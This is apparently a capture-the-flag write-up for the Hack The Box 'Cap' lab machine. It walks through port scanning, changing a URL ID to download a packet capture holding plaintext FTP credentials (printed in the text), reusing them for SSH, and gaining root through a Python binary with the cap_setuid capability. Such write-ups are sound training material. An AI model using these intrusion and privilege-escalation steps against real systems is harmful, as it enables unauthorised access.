HTB Cap Writeup
INFO
Machine IP = 10.10.10.245
OS = Linux
Level = EASY
Points = 20
Write the IP of the machine to your /etc/hosts file
1
echo "10.10.10.245 cap.htb" >> /etc/hosts
Scanning
1
nmap -sC -sV 10.10.10.245
Enumeration
1
2
3
4
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http gunicorn
FTP (Port 21)
FTP anonymous login not available
HTTP (Port 80)
1
http://10.10.10.245/
I found for each time on reload or click on tab Security Snapshot (5 Second PCAP + Analysis)
the variable ID changed and with each time the PCAP file changed no one of them usefull so let’s try with the value 0
1
http://10.10.10.245/data/0
Then I downloaded 0.PCAP file and opened it with wireshark here we can found FTP credentials as below:
USER : nathan
PASSSWORD : Buck3tH4TF0RM3!
With these credentials we going to login to the FTP
we got first flag user.txt
Let’s use same credentials for SSH
1
ssh [email protected] -> with password: Buck3tH4TF0RM3!
Privilege Escalation
Here we going to clone this script linpeas.sh
Then we found
Files with capabilities (limited to 50):
1
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
This means that it’s possible to set the effective user id of the created process
Time to privilege escalation
1
2
3
4
5
6
7
8
nathan@cap:~$ python3
Python 3.8.5 (default, Jan 27 2021, 15:41:15)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.system("/bin/bash")
root@cap:~#
Done!
Hi there 👋 Support me!
Life is an echo—what you send out comes back.
